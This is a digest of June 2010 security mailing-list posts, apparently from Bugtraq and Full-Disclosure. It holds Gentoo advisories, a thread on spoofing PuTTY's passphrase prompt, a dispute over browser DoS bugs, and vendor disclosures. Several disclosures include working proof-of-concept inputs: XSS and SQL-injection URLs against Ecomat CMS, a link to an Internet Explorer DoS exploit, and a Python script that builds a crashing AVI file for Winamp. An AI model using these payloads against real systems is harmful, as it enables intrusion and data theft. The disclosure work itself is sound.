Organization's core business platforms, there are many other threats that are
still overlooked and imply much higher levels of risk. Onapsis Bizploit is 
designed as an academic proof-of-concept that will help the general
community illustrate and understand these kinds of risks.

Currently Onapsis Bizploit provides all the features available in the sapyto 
GPL project, plus several new plugins and connectors focused on the
security of SAP business platforms. Updates for other popular ERPs are to be 
released in the short term.

You can download the software freely from http://www.onapsis.com

Best regards,

- 
The Onapsis Research Labs Team

Onapsis S.R.L
Email: resea...@onapsis.com
Web: www.onapsis.com
PGP: http://www.onapsis.com/pgp/research.asc
- 






[ GLSA 201006-02 ] CamlImages: User-assisted execution of arbitrary code

2010-06-01 Thread Alex Legler
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 201006-02
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: CamlImages: User-assisted execution of arbitrary code
  Date: June 01, 2010
  Bugs: #276235, #290222
ID: 201006-02

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple integer overflows in CamlImages might result in the remote
execution of arbitrary code.

Background
==========

CamlImages is an image processing library for Objective Caml.

Affected packages
=================

    -------------------------------------------------------------------
     Package                    /  Vulnerable  /             Unaffected
    -------------------------------------------------------------------
  1  dev-ml/camlimages              < 3.0.2                   >= 3.0.2

Description
===========

Tielei Wang reported multiple integer overflows, possibly leading to
heap-based buffer overflows in the (1) read_png_file() and
read_png_file_as_rgb24() functions, when processing a PNG image
(CVE-2009-2295) and (2) gifread.c and jpegread.c files when processing
GIF or JPEG images (CVE-2009-2660).

Other integer overflows were also found in tiffread.c (CVE-2009-3296).

Impact
======

A remote attacker could entice a user to open a specially crafted,
overly large PNG, GIF, TIFF, or JPEG image using an application that
uses the CamlImages library, possibly resulting in the execution of
arbitrary code with the privileges of the user running the application.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All CamlImages users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose =dev-ml/camlimages-3.0.2

References
==========

  [ 1 ] CVE-2009-2295
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2295
  [ 2 ] CVE-2009-2660
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2660
  [ 3 ] CVE-2009-3296
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3296

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-201006-02.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
secur...@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.

License
=======

Copyright 2010 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5




Re: [Full-disclosure] PuTTY private key passphrase stealing attack

2010-06-01 Thread halfdog

Jan Schejbal wrote:
> PuTTY, a SSH client for Windows, requests the passphrase to the ssh key in the
> console window used for the connection. This could allow a malicious server to
> gain access to a user's passphrase by spoofing that prompt

That seems to be the default for many ssh clients; you might want to look at
http://lists.mindrot.org/pipermail/openssh-unix-dev/2008-May/026416.html for
older discussion on that topic.

Regards, a dog

- -- 
http://www.halfdog.net/
PGP: 156A AE98 B91F 0114 FE88  2BD8 C459 9386 feed a bee


[ GLSA 201006-01 ] FreeType 1: User-assisted execution of arbitrary code

2010-06-01 Thread Alex Legler
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 201006-01
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: FreeType 1: User-assisted execution of arbitrary code
  Date: June 01, 2010
  Bugs: #271234
ID: 201006-01

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple vulnerabilities in FreeType might result in the remote
execution of arbitrary code.

Background
==========

FreeType is a TrueType font rendering library.

Affected packages
=================

    -------------------------------------------------------------------
     Package    /       Vulnerable         /         Unaffected
    -------------------------------------------------------------------
  1  freetype     < 1.4_pre20080316-r2        >= 1.4_pre20080316-r2

Description
===========

Multiple issues found in FreeType 2 were also discovered in FreeType 1.
For details on these issues, please review the Gentoo Linux Security
Advisories and CVE identifiers referenced below.

Impact
======

A remote attacker could entice a user to open a specially crafted TTF
file, possibly resulting in the execution of arbitrary code with the
privileges of the user running FreeType.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All FreeType 1 users should upgrade to an unaffected version:

# emerge --sync
# emerge --ask --oneshot --verbose
">=media-libs/freetype-1.4_pre20080316-r2"

NOTE: This is a legacy GLSA. Updates for all affected architectures are
available since May 27, 2009. It is likely that your system is already
no longer affected by this issue.

References
==========

  [ 1 ] CVE-2006-1861
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1861
  [ 2 ] CVE-2007-2754
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2754
  [ 3 ] GLSA 200607-02
http://www.gentoo.org/security/en/glsa/glsa-200607-02.xml
  [ 4 ] GLSA 200705-22
http://www.gentoo.org/security/en/glsa/glsa-200705-22.xml

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-201006-01.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
secur...@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.

License
=======

Copyright 2010 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5




Re: [Full-disclosure] PuTTY private key passphrase stealing attack

2010-06-01 Thread Rob Fuller
Couldn't this also be thwarted by having a MOTD? It generally displays
before the bashrc if I'm not mistaken.

--
Rob Fuller | Mubix
Room362.com | Hak5.org



On Mon, May 31, 2010 at 8:47 PM, Jan Schejbal
 wrote:
> PuTTY, a SSH client for Windows, requests the passphrase to the ssh key in
> the console window used for the connection. This could allow a malicious
> server to gain access to a user's passphrase by spoofing that prompt.
>
> We assume that the user is using key-based ssh auth with ssh and connects
> using PuTTY. PuTTY now asks for the passphrase to the key. The user enters
> the passphrase. If the passphrase is wrong, PuTTY will now request the
> passphrase again after stating that it was wrong. If the passphrase is
> correct, the connection to the server is established.
>
> A malicious/manipulated server could then display "Wrong passphrase" and ask
> for the passphrase again. If the user enters it again, it is sent to the
> malicious server.
>
> As far as I can see, there are only two ways how the user might detect it:
>
> 1. The real "Wrong passphrase" message is displayed without delay. After
> entering the correct passphrase, a small delay occurs.
>
> 2. The prompt contains the name of the key as stored on the client. Often
> the same name is used in the authorized_keys file on the server, giving it
> to the attacker. Maybe it is also possible for the server to remotely read
> the screen contents or duplicate it using some xterm control sequences, so
> users should not rely on it.
>
> (See also the attached screenshot, where you can see that there is no
> visible difference.)
>
> I assume that there are more similar issues like this one using different
> authentication modes etc.
>
> This can be exploited using a modified .bashrc file. This means that once an
> attacker has gained access to a user account on the server, he can try this
> to gain the passphrase to the key.
>
> Impact:
> Low.
> As a malicious server is required, the attack probability is not very high.
> Without the keyfile, the passphrase is worthless to the attacker unless it
> is used in multiple places. However, key-based auth is supposed to be secure
> even with untrusted/malicious servers.
>
> Developer notification:
> The possibility of such spoofing attacks is known:
> http://www.chiark.greenend.org.uk/~sgtatham/putty/wishlist/gui-auth.html
>
> Workaround:
> Load the key into the Pageant agent before establishing the connection
>
> Other software affected:
> Probably many console-based SSH tools have similar issues.
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>


XSS vulnerability in Ecomat CMS

2010-06-01 Thread advisory
Vulnerability ID: HTB22391
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_ecomat_cms.html
Product: Ecomat CMS
Vendor: Codefabrik GmbH
Vulnerable Version: 5.0 and Probably Prior Versions
Vendor Notification: 18 May 2010 
Vulnerability Type: XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium 
Credit: High-Tech Bridge SA (http://www.htbridge.ch/) 

Vulnerability Details:
A user can execute arbitrary JavaScript code within the vulnerable application.

The vulnerability exists due to the failure of the "index.php" script to properly
sanitize user-supplied input in the "lang" variable. Successful exploitation of
this vulnerability could result in a compromise of the application, theft of
cookie-based authentication credentials, or disclosure or modification of
sensitive data.

An attacker can use a browser to exploit this vulnerability. The following PoC is
available:


http://host/index.php?type=web&lang=xx%22+onmouseover=alert%28123%29+style=position:absolute;left:0;top:0;width:100%;height:100%+&show=25&mhs=0





SQL injection vulnerability in Ecomat CMS

2010-06-01 Thread advisory
Vulnerability ID: HTB22390
Reference: 
http://www.htbridge.ch/advisory/sql_injection_vulnerability_in_ecomat_cms.html
Product: Ecomat CMS
Vendor: Codefabrik GmbH
Vulnerable Version: 5.0 and Probably Prior Versions
Vendor Notification: 18 May 2010 
Vulnerability Type: SQL Injection
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: High 
Credit: High-Tech Bridge SA (http://www.htbridge.ch/) 

Vulnerability Details:
The vulnerability exists due to the failure of the "index.php" script to properly
sanitize user-supplied input in the "show" variable. An attacker can alter queries to
the application's SQL database, execute arbitrary queries against the database,
compromise the application, access or modify sensitive data, or exploit various
vulnerabilities in the underlying SQL database.

An attacker can use a browser to exploit this vulnerability. The following PoC is
available:


http://host/index.php?type=web&lang=de&show=-1+union+select+user%28%29+--+&mhs=0





DoS vulnerability in Internet Explorer

2010-06-01 Thread MustLive

Hello Bugtraq!

I want to warn you about a Denial of Service vulnerability in Internet
Explorer, which I already disclosed at my site in 2008 (on 29.09.2008). But
recently I made new tests concerning this vulnerability, so I decided to
remind you about it.

I have known about this vulnerability for a long time - it's a well-known DoS in IE. It
works in IE6, and after the release of IE7 I hoped that Microsoft had fixed this hole
in the seventh version of the browser. But as I tested on 29.09.2008, IE7 was
also vulnerable to this attack. And as I tested recently, IE8 is also
vulnerable to this attack.

I also informed Microsoft on 01.10.2008 about it, but they ignored it and
didn't fix it. They didn't fix the hole in IE6, IE7, or IE8.

At that time I published about this vulnerability at SecurityVulns
(http://securityvulns.com/Udocument636.html).

DoS:

The vulnerability concerns the browser's handling of expressions in styles,
which causes IE to stop working.

http://websecurity.com.ua/uploads/2008/IE%20DoS%20Exploit4.html

Vulnerable versions are Internet Explorer 6 (6.0.2900.2180), Internet 
Explorer 7 (7.0.6000.16711), Internet Explorer 8 (8.0.7600.16385) and 
previous versions.


To Susan Bradley from Bugtraq:

This is one of those cases, which I told you about before, where browser vendors
neglect to fix DoS holes in their browsers for many years.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua



[Bkis-02-2010] Multiple Vulnerabilities in CMS Made Simple - Bkis

2010-06-01 Thread Bkis

[Bkis-02-2010] Multiple Vulnerabilities in CMS Made Simple

1. General information

CMS Made Simple is a free content management system (CMS) written in PHP, 
available at www.cmsmadesimple.org. In March 2010, Bkis Security discovered 
several XSS and CSRF vulnerabilities in CMS Made Simple 1.7.1. Taking advantage 
of these vulnerabilities, a hacker is able to insert pieces of code into a 
path's link that execute in the user's browser, causing the loss of cookies and 
session. A hacker is also able to trick users into manipulating some of the 
system's functions without the users' knowledge. Bkis has informed the CMS Made 
Simple development team of these vulnerabilities.


Details: 
http://security.bkis.com/multiple-vulnerabilities-in-cms-made-simple/

SVRT Advisory: Bkis-02-2010
Initial vendor notification: 05/12/2010
Release Date: 06/21/2010
Update Date: 06/21/2010
Discovered by: Truong Thao Nguyen, Do Hoang Bach, Cao Xuan Sang
Attack Type: XSS, CSRF
Security Rating: High
Impact: Code Execution
Affected Software: CMS Made Simple (version <= 1.7.1)

2. Technical details

The XSS vulnerability is found in the following modules:
- Add Pages
- Add Global Content
- Edit Global Content
- Add Article
- Add Category
- Add Field Definition
- Add Shortcut

Since the input variables of these functions are not carefully checked and 
filtered, a hacker is able to insert pieces of code into a path's link. When 
users sign in and click this link, the malicious code (JavaScript) will be 
executed, leading to the loss of cookies, session, etc.


The CSRF vulnerability is found in the following module:
- Change group permission

Since the task is performed without first seeking the user's confirmation, 
users can be tricked into performing it without being aware. Thus, a hacker 
is able to perform malicious actions via legitimate users.


In addition, the vulnerabilities are all found in the content management section 
of CMS Made Simple. Thus, the victims of such vulnerabilities are the system's 
administrators, editors and designers.


3. Solution

The CMS Made Simple development team has not yet issued patches for these 
vulnerabilities. Thus, Bkis strongly recommends that individuals and 
organizations using this software take caution when receiving links, 
and at the same time keep track of information about the latest software 
version in order to update.



Bui Quang Minh
Manager - Vuln Team - Bkis Security - Bkis

Office : Hitech building - 1A Dai Co Viet, Hanoi
Email : min...@bkav.com.vn
Website : www.bkav.com.vn; www.bkav.com
Blog : security.bkis.com
  



Re: Nginx 0.8.35 Space Character Remote Source Disclosure

2010-06-01 Thread Zach
Does not work on 0.7.65.

On Mon, May 31, 2010 at 11:00 AM,   wrote:
> what about the stable branch? Versions 0.7.65 and earlier?
>


RE: Nginx 0.8.35 Space Character Remote Source Disclosure

2010-06-01 Thread reply-to-list
Looks like this affected Windows only, and was fixed a while ago.

Changes with nginx 0.7.65                                        01 Feb 2010

*) Security: now nginx/Windows ignores trailing spaces in URI.
   Thanks to Dan Crowley, Core Security Technologies. 

-Original Message-
From: abc12...@hushmail.com [mailto:abc12...@hushmail.com] 
Sent: Monday, May 31, 2010 11:00 AM
To: bugtraq@securityfocus.com
Subject: Re: Nginx 0.8.35 Space Character Remote Source Disclosure

what about the stable branch? Versions 0.7.65 and earlier?



Re: DoS vulnerabilities in Firefox, Internet Explorer, Chrome and Opera

2010-06-01 Thread John Smith

Hi Mustlive,
I'm not sure if there's a need to discuss or clarify this any further. 
Please refer to my earlier posts, and for the sake of saving some of our 
time & efforts, avoid drawing tangents about scripts and noscripts (I've 
clarified both earlier) & weasel words (security vulnerability and nntp 
exploit - irrelevant in this case).
JS or no-JS, this issue is nothing new; this behavior is well-defined and a 
necessity, and definitely not a URI (of any kind) exploit or a security 
vulnerability.


Some last specifics (mostly reiterating what I said in my earlier posts) -
1. You can take this issue up with the content aggregators (CDN etc) and/or 
website programmers; this is not an issue to be addressed by the web browsers, 
because the solution to it remains imperfect in theory (one of my posts has 
a 'workaround'...maybe a 'good to have' feature which WILL open up another 
can of worms...).
2. Now the even vaguer non-scripted issue which you insist upon - if you are 
trying to say that 1000 lines of  (which is 
executed sequentially by any JVM as a fact) is an 'exploit' and 'security 
vulnerability', isn't there a HUGE point missing?
NOTE: again, I'm not sure why you claim it's an 'nntp' exploit. As I noted 
earlier, it's applicable to any URI handler and their behaviour is nothing 
unexpected.
3. Your POC used JS and is non-functional without scripting enabled. It 
was taken offline since I last checked (my 2nd last post?), which should 
have been your sample reference for this discussion (it's appearing to shift 
now).


Best Regards,
w

--
From: "MustLive" 
Sent: Monday, May 31, 2010 9:33 PM
To: "Susan Bradley" 
Cc: 
Subject: Re: DoS vulnerabilities in Firefox, Internet Explorer, Chrome and 
Opera



Hello Susan and other readers who replied to my previous advisory.

Earlier I already answered Vladimir; now I'd answer Susan and soon I'd
answer John. But first one important note to every reader of the list,
including John Smith, which I already wrote about 1.5 weeks ago (after
posting the first advisory about DoS in browsers) to one reader of
Full-disclosure who inattentively read that advisory (he missed the message
about attacking without JS) and also to Mozilla (who started discussing this
issue and only drew attention to the JS attack vector). That is, as I wrote
in both advisories, this attack via iframes can also be conducted without
JavaScript. So even turning JS off will not help.

Due to the advantages of a JS exploit for these vulnerabilities over a non-JS
exploit, I wrote JavaScript exploits for these advisories and I'd write them for
future advisories (but I'd be reminding about the possibility of attacking
without JS). But soon I'll present one exploit also in a "pure-iframe" version
(without JS) for Internet Explorer and other applications - for the case when
a small number of iframes leads to a crash.


Thank you.  Now if you could wait for patches before disclosing I'd be
even happier.


Susan, you are welcome.

I would be happy to wait for patches from browser vendors, but as I already
told you in detail, it's not possible due to the behavior of browser vendors.
They mostly ignore such holes; they don't count DoS as vulnerabilities,
they call them "stability issues" and so don't attend to them seriously
(not fixing them, or fixing them slowly). I don't respect such a statement
as "stability issues" for DoS holes, and during 2008-2010 I worked hard to
change vendors' minds on this issue, but they still ignore it.

Also, as I already told you, they never say whether they fixed such holes or not
(especially taking into account that they almost always ignore my letters
with such holes or, as Opera did a few times, answer with an "it's stability
issues" statement). So I have no way to know from them whether they fixed
it or not - and because they don't care about such issues (ignoring them or
calling them stability issues), they never mention them in vendor advisories.
Only one time did Microsoft inform me about fixing a DoS hole in Outlook - even
though they called it a stability issue, they informed me after they released
a patch for it (which was a serious approach, but neither Microsoft for IE
nor other vendors use such an approach for DoS holes in browsers).


But take into account that I informed (on 26.05.2010) all four browser
vendors about many vulnerabilities, which I'll disclose in the future. So
they are informed long in advance :-). And so you have no need to worry,
because with every day they become more and more "informed long ago" and
have more and more days to fix these holes.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

- Original Message - 
From: "Susan Bradley" 

To: "MustLive" 
Cc: 
Sent: Friday, May 28, 2010 7:06 PM
Subject: Re: [Suspected Spam]DoS vulnerabilities in Firefox, Internet
Explorer, Chrome and Opera



Thank you.  Now if you could wait for patches before disclos

RE: Ghostscript 8.64 executes random code at startup

2010-06-01 Thread Michael Wojcik
> From: paul.sz...@sydney.edu.au [mailto:paul.sz...@sydney.edu.au]
> Sent: Sunday, 30 May, 2010 06:50
> 
> I also see no -P- and no absolute paths for the ps files mentioned in
> many "gs scripts" e.g. /usr/bin/pdf2dsc or /usr/bin/ps2ascii . Also,
> crappy coding for "GS_EXECUTABLE=gs". Am not sure if these are
> "originally gs" or "Debian special".

I believe they're all part of the standard Ghostscript distribution; at
any rate, they're in the Windows Ghostscript distribution I have
installed here.

The Windows scripts (gs*\lib\*.bat) are similarly vulnerable: no use of
-P-, and letting the executable name be overridden by an environment
variable.

-- 
Michael Wojcik
Principal Software Systems Developer, Micro Focus



Winamp v5.571 malicious AVI file handling DoS Vulnerability

2010-06-01 Thread praveen_recker

# Tested on Windows 7 and Winamp v5.571(x86)
# This bug is informed to Nullsoft and was fixed long back.
# The status can be found at
# http://forums.winamp.com/showthread.php?s=&threadid=316000
# This code works on Python 3.0. To make it work on <3.0 remove braces in print

print("\n***Winamp v5.571 malicious AVI file handling DoS Vulnerability***\n")

try:
    # The whole PoC is an empty (zero-size) .avi file; the original
    # open() call was left without a close, so use a context manager
    with open('winampcrash.avi', 'w'):
        pass
    print("Creating malicious AVI file . . . \n")
    print("Successfully created Zero size AVI file\n")
    print("Open created Zero size AVI file in Winamp.Boom\n\n")
except IOError:
    print("Unable to create Zero size AVI file\n")

"""

Following is the WinDBG status when we open winampcrash.AVI file in Winamp 
v5.571(x86)



(f00.e60): Access violation - code c005 (first chance)

First chance exceptions are reported before any exception handling.

This exception may be expected and handled.

eax= ebx= ecx= edx= esi=0886fe68 edi=02880618

eip=076243f1 esp=0886fc50 ebp=0886ff28 iopl=0 nv up ei pl zr na pe nc

cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b efl=00010246

in_AVI!winampGetInModule2+0x13da:

076243f1 8b4008  mov eax,dword ptr [eax+8] ds:002b:0008=





"""





#Best Regards,

#Praveen Darshanam